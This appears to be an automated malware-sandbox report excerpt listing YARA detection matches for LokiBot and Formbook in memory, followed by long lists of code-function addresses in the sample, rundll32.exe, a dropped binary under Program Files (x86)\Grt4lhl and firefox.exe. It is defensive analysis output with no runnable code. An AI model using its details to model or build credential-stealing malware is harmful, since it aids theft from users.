        Source: 0000000F.00000002.51929622698.0000000004887000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_004017722_2_00401772
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_004017252_2_00401725
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_004015362_2_00401536
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02322AD22_2_02322AD2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023123862_2_02312386
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231C88B2_2_0231C88B
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023206A22_2_023206A2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231523E2_2_0231523E
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0232322B2_2_0232322B
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023158142_2_02315814
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023110692_2_02311069
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023211612_2_02321161
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231CE0C2_2_0231CE0C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023207542_2_02320754
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231FFED2_2_0231FFED
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023104A32_2_023104A3
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023214902_2_02321490
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231A5742_2_0231A574
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E980EAD10_2_1E980EAD
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1EB210_2_1E8D1EB2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E989ED210_2_1E989ED2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C2EE810_2_1E8C2EE8
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E912E4810_2_1E912E48
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F0E5010_2_1E8F0E50
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98EFBF10_2_1E98EFBF
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E981FC610_2_1E981FC6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE010_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DCF0010_2_1E8DCF00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98FF6310_2_1E98FF63
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E969C9810_2_1E969C98
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8E8CDF10_2_1E8E8CDF
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EFCE010_2_1E8EFCE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E99ACEB10_2_1E99ACEB
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E957CE810_2_1E957CE8
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C0C1210_2_1E8C0C12
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DAC2010_2_1E8DAC20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97EC4C10_2_1E97EC4C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C6010_2_1E8D3C60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E986C6910_2_1E986C69
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98EC6010_2_1E98EC60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8E2DB010_2_1E8E2DB0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D9DD010_2_1E8D9DD0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96FDF410_2_1E96FDF4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CAD0010_2_1E8CAD00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98FD2710_2_1E98FD27
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E987D4C10_2_1E987D4C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0D6910_2_1E8D0D69
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98FA8910_2_1E98FA89
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EFAA010_2_1E8EFAA0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98CA1310_2_1E98CA13
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98EA5B10_2_1E98EA5B
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E944BC010_2_1E944BC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E90DB1910_2_1E90DB19
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0B1010_2_1E8D0B10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98FB2E10_2_1E98FB2E
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8E688210_2_1E8E6882
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E9498B210_2_1E9498B2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E9818DA10_2_1E9818DA
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D28C010_2_1E8D28C0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E9878F310_2_1E9878F3
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D380010_2_1E8D3800
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FE81010_2_1E8FE810
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97083510_2_1E970835
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B686810_2_1E8B6868
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E94587010_2_1E945870
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98F87210_2_1E98F872
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D987010_2_1E8D9870
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EB87010_2_1E8EB870
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CE9A010_2_1E8CE9A0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98E9A610_2_1E98E9A6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E9159C010_2_1E9159C0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D068010_2_1E8D0680
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98A6C010_2_1E98A6C0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CC6E010_2_1E8CC6E0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98F6F610_2_1E98F6F6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E9436EC10_2_1E9436EC
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EC60010_2_1E8EC600
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96D62C10_2_1E96D62C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97D64610_2_1E97D646
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F467010_2_1E8F4670
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98675710_2_1E986757
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D276010_2_1E8D2760
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DA76010_2_1E8DA760
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93D48010_2_1E93D480
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D044510_2_1E8D0445
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98F5C910_2_1E98F5C9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E9875C610_2_1E9875C6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E99A52610_2_1E99A526
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BD2EC10_2_1E8BD2EC
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98124C10_2_1E98124C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C138010_2_1E8C1380
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DE31010_2_1E8DE310
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E98F33010_2_1E98F330
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E90508C10_2_1E90508C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C00A010_2_1E8C00A0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DB0D010_2_1E8DB0D0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E9870F110_2_1E9870F1
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97E07610_2_1E97E076
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D51C010_2_1E8D51C0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EB1E010_2_1E8EB1E0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E99010E10_2_1E99010E
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BF11310_2_1E8BF113
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E96D13010_2_1E96D130
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E91717A10_2_1E91717A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0437044515_2_04370445
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043DD48015_2_043DD480
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0443A52615_2_0443A526
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_044275C615_2_044275C6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442F5C915_2_0442F5C9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0441D64615_2_0441D646
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0438C60015_2_0438C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0439467015_2_04394670
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0440D62C15_2_0440D62C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442A6C015_2_0442A6C0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442F6F615_2_0442F6F6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0437068015_2_04370680
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043E36EC15_2_043E36EC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0436C6E015_2_0436C6E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442675715_2_04426757
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0437276015_2_04372760
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0437A76015_2_0437A760
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0441E07615_2_0441E076
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043600A015_2_043600A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_044270F115_2_044270F1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043A508C15_2_043A508C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0437B0D015_2_0437B0D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0435F11315_2_0435F113
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043B717A15_2_043B717A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0443010E15_2_0443010E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0440D13015_2_0440D130
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0438B1E015_2_0438B1E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043751C015_2_043751C0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442124C15_2_0442124C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0435D2EC15_2_0435D2EC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0437E31015_2_0437E310
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442F33015_2_0442F330
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0436138015_2_04361380
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0441EC4C15_2_0441EC4C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0437AC2015_2_0437AC20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442EC6015_2_0442EC60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04360C1215_2_04360C12
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04426C6915_2_04426C69
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04373C6015_2_04373C60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0443ACEB15_2_0443ACEB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043F7CE815_2_043F7CE8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0438FCE015_2_0438FCE0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04409C9815_2_04409C98
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04388CDF15_2_04388CDF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04427D4C15_2_04427D4C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0436AD0015_2_0436AD00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04370D6915_2_04370D69
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442FD2715_2_0442FD27
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04382DB015_2_04382DB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0440FDF415_2_0440FDF4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04379DD015_2_04379DD0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04410E6D15_2_04410E6D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04390E5015_2_04390E50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043B2E4815_2_043B2E48
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04371EB215_2_04371EB2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04429ED215_2_04429ED2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04362EE815_2_04362EE8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04420EAD15_2_04420EAD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442FF6315_2_0442FF63
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0437CF0015_2_0437CF00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04421FC615_2_04421FC6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04376FE015_2_04376FE0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442EFBF15_2_0442EFBF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0439E81015_2_0439E810
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442F87215_2_0442F872
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0437380015_2_04373800
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0437987015_2_04379870
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0438B87015_2_0438B870
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043E587015_2_043E5870
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0435686815_2_04356868
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0441083515_2_04410835
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043E98B215_2_043E98B2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_044218DA15_2_044218DA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_044278F315_2_044278F3
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0438688215_2_04386882
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043728C015_2_043728C0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0436E9A015_2_0436E9A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442E9A615_2_0442E9A6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043B59C015_2_043B59C0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442EA5B15_2_0442EA5B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442CA1315_2_0442CA13
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0438FAA015_2_0438FAA0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442FA8915_2_0442FA89
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043ADB1915_2_043ADB19
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04370B1015_2_04370B10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0442FB2E15_2_0442FB2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_043E4BC015_2_043E4BC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00408C7B15_2_00408C7B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00408C8015_2_00408C80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00402D8715_2_00402D87
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00402D9015_2_00402D90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0041BE9F15_2_0041BE9F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0041CF4015_2_0041CF40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00402FB015_2_00402FB0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_022A2AD222_2_022A2AD2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_0229238622_2_02292386
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_0229C88B22_2_0229C88B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_022A06A222_2_022A06A2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_022A322B22_2_022A322B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_0229523E22_2_0229523E
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_0229581422_2_02295814
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_0229106922_2_02291069
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_022A116122_2_022A1161
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_0229CE0C22_2_0229CE0C
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_022A075422_2_022A0754
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_0229FFED22_2_0229FFED
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_022904A322_2_022904A3
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_022A149022_2_022A1490
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 22_2_0229A57422_2_0229A574
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 25_2_000001BF40004D0225_2_000001BF40004D02
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 25_2_000001BF3FFFD8FB25_2_000001BF3FFFD8FB
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 25_2_000001BF400002FF25_2_000001BF400002FF
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 25_2_000001BF3FFFD90225_2_000001BF3FFFD902
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 25_2_000001BF4000030225_2_000001BF40000302
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 25_2_000001BF40003F0625_2_000001BF40003F06
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 25_2_000001BF3FFFE35925_2_000001BF3FFFE359
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 25_2_000001BF3FFFE36225_2_000001BF3FFFE362
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 25_2_000001BF400027B225_2_000001BF400027B2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_022A2AD226_2_022A2AD2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_0229238626_2_02292386
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_0229C88B26_2_0229C88B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_022A06A226_2_022A06A2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_022A322B26_2_022A322B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_0229523E26_2_0229523E
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_0229581426_2_02295814
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_0229106926_2_02291069
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_022A116126_2_022A1161
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_0229CE0C26_2_0229CE0C
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_022A075426_2_022A0754
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_0229FFED26_2_0229FFED
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_022904A326_2_022904A3
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_022A149026_2_022A1490
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 26_2_0229A57426_2_0229A574
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_02332AD227_2_02332AD2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0232238627_2_02322386
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0232C88B27_2_0232C88B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_023306A227_2_023306A2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0232523E27_2_0232523E
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0233322B27_2_0233322B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0232581427_2_02325814
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0232106927_2_02321069
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0233116127_2_02331161
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0232CE0C27_2_0232CE0C
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0233075427_2_02330754
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0232FFED27_2_0232FFED
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_023204A327_2_023204A3
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0233149027_2_02331490
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 27_2_0232A57427_2_0232A574
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EAB0EAD28_2_1EAB0EAD
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA01EB228_2_1EA01EB2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1E9F2EE828_2_1E9F2EE8
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EAB9ED228_2_1EAB9ED2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EAA0E6D28_2_1EAA0E6D
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA42E4828_2_1EA42E48
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA20E5028_2_1EA20E50
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EABEFBF28_2_1EABEFBF
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 28_2_1EA06FE028_2_1EA06FE0
